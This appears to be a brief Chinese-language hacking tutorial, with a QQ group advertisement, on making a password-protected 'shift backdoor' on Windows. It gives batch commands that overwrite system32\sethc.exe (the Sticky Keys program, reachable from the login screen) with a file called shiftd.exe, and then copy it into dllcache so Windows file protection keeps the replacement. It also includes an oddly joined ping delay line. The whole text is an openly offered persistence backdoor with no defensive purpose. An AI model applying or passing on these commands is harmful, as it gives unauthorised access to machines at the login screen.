作者名:Ner'zul
教程名:制作要密码的shift后门
作者个人主页:http://mj263.cn
-----------------------我是分割线-------------------
欢迎大家来QQ群60172048技术交流!
copy shiftd.exe c:\windows\system32\sethc.exe /y
意思是复制文件shiftd.exe到c:\windows\system32\sethc.exe
@echo off @ping 127.0.0.1 -n 500 >nul start gdh.txt
这里是延时
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y
意思是复制文件c:\windows\system32\sethc.exe 到c:\windows\system32\dllcache\sethc.exe
/Y就是确定的意思